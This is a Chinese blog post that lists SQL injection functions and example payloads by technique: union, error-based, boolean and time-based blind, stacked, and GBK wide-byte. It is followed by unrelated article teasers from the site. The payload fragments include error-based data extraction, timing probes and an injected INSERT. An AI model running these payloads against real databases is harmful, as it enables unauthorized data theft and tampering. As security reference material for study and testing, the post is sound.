SQL 注入所需函数详解——按注入方式分类
📅 2026/7/31 15:00:54
👁️ 次浏览
新人博客已发布文章会持续更新有短缺请见谅会尽快补齐欢迎评论区提出谢谢一、联合查询注入UNION 注入联合查询注入是最常见的注入方式核心是使用UNION SELECT将攻击者构造的查询结果拼接到原查询结果中。1.1 核心函数函数用途示例UNION SELECT合并两个查询结果集UNION SELECT 1,2,3ORDER BY判断原查询的字段数ORDER BY 1--LIMIT限制返回行数LIMIT 0,1GROUP_CONCAT()将多行结果拼接成一行MySQLSELECT GROUP_CONCAT(table_name)CONCAT()拼接字符串SELECT CONCAT(username,0x3a,password)CONCAT_WS()使用分隔符拼接字符串SELECT CONCAT_WS(~,a,b)DATABASE()获取当前数据库名UNION SELECT DATABASE()USER()获取当前用户UNION SELECT USER()VERSION()获取数据库版本UNION SELECT VERSION()二、报错注入报错注入利用数据库错误信息回显敏感数据适用于页面有错误回显但无正常回显位的场景。2.1 MySQL 报错函数函数用途示例updatexml()XML 文档更新函数参数错误时报错泄密updatexml(1,concat(0x7e,database()),1)extractvalue()XML 值提取函数语法错误时报错extractvalue(1,concat(0x7e,(SELECT table_name)))floor()向下取整 group by 产生主键冲突报错SELECT count(*),CONCAT(database(),floor(rand(0)*2))x FROM users GROUP BY xexp()指数函数参数过大时报错exp(~(SELECT * FROM (SELECT user())a))NAME_CONST()重复列名导致报错SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1))xBIGINT 溢出利用 ~0 与子查询拼接产生大数据溢出报错SELECT !(SELECT * FROM (SELECT user())x)-~02.2 SQL Server 报错函数函数用途示例convert()类型转换将查询结果转为 int 报错convert(int,version)CTXSYS.DRITHSX.SN()Oracle 报错注入函数CTXSYS.DRITHSX.SN(user,(SELECT banner FROM v$version))三、布尔盲注页面没有回显和报错但根据 SQL 语句正确与否会返回不同页面状态时使用布尔盲注。3.1 核心函数函数用途示例substr()截取字符串MySQLsubstr(database(),1,1)substring()截取字符串通用substring((SELECT table_name),1,1)mid()截取字符串MySQLmid(database(),1,1)left()从左侧截取 n 个字符left(database(),1)right()从右侧截取 n 个字符right(database(),1)ascii()返回字符的 ASCII 值ascii(substr(database(),1,1))ord()等同于 ascii()ord(substr(database(),1,1))length()返回字符串长度length(database())if()三目条件判断if(11,sleep(1),0)strcmp()字符串比较strcmp(left(database(),1),a)四、时间盲注页面没有任何回显差异时通过延时函数判断注入结果。4.1 核心函数函数适用数据库示例sleep()MySQLSELECT if(ascii(substr(database(),1,1))100,sleep(3),0)benchmark()MySQLSELECT benchmark(50000000,md5(test))WAITFOR DELAYSQL ServerWAITFOR DELAY 0:0:3DBMS_LOCK.SLEEP()OracleDBMS_LOCK.SLEEP(3)pg_sleep()PostgreSQLSELECT pg_sleep(3)GET_LOCK()MySQLSELECT GET_LOCK(a,3)heavy query通用SELECT count(*) FROM information_schema.columns A, information_schema.columns B五、堆叠注入支持一次执行多条 SQL 语句时可以使用堆叠注入。5.1 核心函数函数 / 语法用途示例;语句分隔符执行多条 SQL1;INSERT INTO users VALUES(hacker,pass);--HANDLERMySQL 中直接读取表数据无需 SELECT 权限HANDLER table_name OPEN; HANDLER table_name READ FIRST;PREPARE准备语句动态执行 SQLSET sqlCONCAT(SEL,ECT user());PREPARE st FROM sql;EXECUTE st;六、宽字节注入当数据库编码为 GBK 时利用反斜杠\与后续字符组合成 GBK 汉字绕开转义。6.1 核心函数函数用途示例%df结合\形成 GBK 汉字吃掉转义符?id1%df UNION SELECT 1,2,3--SET NAMES设置字符集理解宽字节成因SET NAMES gbk
新房装修完想快点入住,但一开门就是刺鼻的装修味,检测仪一测甲醛数值直奔 0.2mg/m 往上。租房成本压着、搬家日子催着,急住家庭最想知道的是:到底用什么方法除甲醛又快又稳,入住之后还不会反弹?市面上除甲醛…
📅 2026/7/31 15:00:54
GetQzonehistory:三步完成QQ空间数据备份的完整方案 【免费下载链接】GetQzonehistory 获取QQ空间发布的历史说说 项目地址: https://gitcode.com/GitHub_Trending/ge/GetQzonehistory
你是否曾想过要永久保存QQ空间里的青春记忆?那些记录成长点滴…
📅 2026/7/31 14:59:54
“统招本科吗?”
我说不是,我是培训班出来的。
面试官把简历递回来,全程不到三十秒。
这是我在西安的第九次面试,也是第九次卡在同一个问题上。27 岁,干 Java 三年,我连一次技术面的二面都没进过。
简历…
📅 2026/7/31 14:59:54
替换如下报错了 喜闻乐见!
07-30 13:53:43.918 216 216 I servicemanager: Found android.hardware.automotive.vehicle.IVehicle/default in device VINTF manifest.
07-30 13:53:43.918 224 224 I ServiceManager: Waiting for service android.hardware.…
📅 2026/7/31 15:45:55
HarmonyOS应用开发实战:猫猫大作战-UTD 类型的使用【apple_product_name】 前言
欢迎加入开源鸿蒙跨平台社区:https://openharmonycrossplatform.csdn.net
猫猫大作战的截图分享、存档导入、道具图片传输都依赖 UTD(Uniform DataType&#…
📅 2026/7/31 15:45:55
如何在Windows上快速生成全新AnyDesk ID:终极完整指南 【免费下载链接】generate-a-new-anydesk-id Generate a new AnyDesk ID 项目地址: https://gitcode.com/gh_mirrors/ge/generate-a-new-anydesk-id
你是否遇到过AnyDesk远程连接出现异常,或…
📅 2026/7/31 15:45:55
CompressO:为什么你的视频和图片总是太大?这个免费工具能帮你缩小90% 【免费下载链接】compressO Convert any video/image into a tiny size. 100% free & open-source. Available for Mac, Windows & Linux. 项目地址: https://gitcode.com/…
📅 2026/7/31 15:45:55
自制大功率步进电机驱动系统:从原理到实战在工业自动化、3D打印、CNC机床等应用中,大功率步进电机的精准控制一直是技术难点。市面上的驱动模块往往功率有限或价格昂贵,而自制驱动系统不仅能满足特定功率需求,还能深入理解电机控制…
📅 2026/7/31 15:45:55
1. 项目概述:为什么我们需要NIST原子光谱数据库?如果你在化学分析、天体物理、等离子体诊断或者材料科学领域工作,那么“NIST原子光谱数据库”(NIST Atomic Spectra Database, ASD)对你来说,可能就像一本物…
📅 2026/7/31 15:44:54
数据库复制是把主库数据同步到备库的机制,分为逻辑复制和物理复制两种。逻辑复制传输的是 SQL 语句或行变更事件,物理复制传输的是存储引擎底层的物理日志。阿里云 PolarDB(云原生数据库)采用物理复制,在同步延迟、数据…
📅 2026/7/31 0:00:23
BilibiliDown:3分钟学会B站视频下载的终极指南 【免费下载链接】BilibiliDown (GUI-多平台支持) B站 哔哩哔哩 视频下载器。支持稍后再看、收藏夹、UP主视频批量下载|Bilibili Video Downloader 😳 项目地址: https://gitcode.com/gh_mirrors/bi/Bilib…
📅 2026/7/31 0:00:23
当前,游戏行业的“DataAI融合”已从概念验证进入价值落地阶段。根据IDC 2025年数据,中国AI游戏云市场规模已达18.6亿元;同时,游戏研发环节AI渗透率高达86%,生成式AI内容普及率超过50%。面对庞大的市场,游戏…
📅 2026/7/31 0:00:23
更多请点击:
https://codechina.net
第一章:AI帮助理解数学概念 人工智能正以前所未有的方式重塑数学学习的路径。通过自然语言处理与符号计算的深度融合,AI不仅能解析抽象定义,还能将定理、证明和几何直觉转化为可交互、可验证的…
📅 2026/7/31 1:18:08
1. 项目背景与核心价值去年参与的一个短剧项目让我深刻体会到传统创作流程的痛点:编剧团队花了三周打磨剧本,角色设计反复修改了七版,最后成片时又因为演员档期问题不得不临时调整分镜。这种低效的创作模式在快节奏的内容行业越来越难以为继。…
📅 2026/7/31 1:18:08
remix-i18next TypeScript类型安全实践:确保翻译键与类型定义同步 【免费下载链接】remix-i18next The easiest way to translate your React Router framework mode apps 项目地址: https://gitcode.com/gh_mirrors/re/remix-i18next
在开发多语言应用时&am…
📅 2026/7/31 1:18:08
目录
第一步:选对模板,省心一半
第二步:打开扫码点餐功能
开启功能按钮
桌台管理与桌码生成
第三步:个性化设计,打造品牌感
调整点餐页面
设置点餐规则 你还在让顾客站着排队点餐吗?2025年ÿ…
📅 2026/7/31 7:18:38
在业务中快速构建一个能理解私有文档、准确回答专业问题的智能助手,是很多开发团队面临的共同挑战。传统方案往往需要从零开始搭建复杂的 RAG(检索增强生成)系统,涉及文档解析、向量化、检索、大模型调用等多个环节,整…
📅 2026/7/30 17:17:14
FAE放射组学分析工具:医学影像特征探索的完整解决方案 【免费下载链接】FAE FeAture Explorer 项目地址: https://gitcode.com/gh_mirrors/fae/FAE
你是否曾经面对海量医学影像数据感到无从下手?想要从CT、MRI等影像中提取有价值的定量特征&#…
📅 2026/7/31 5:18:28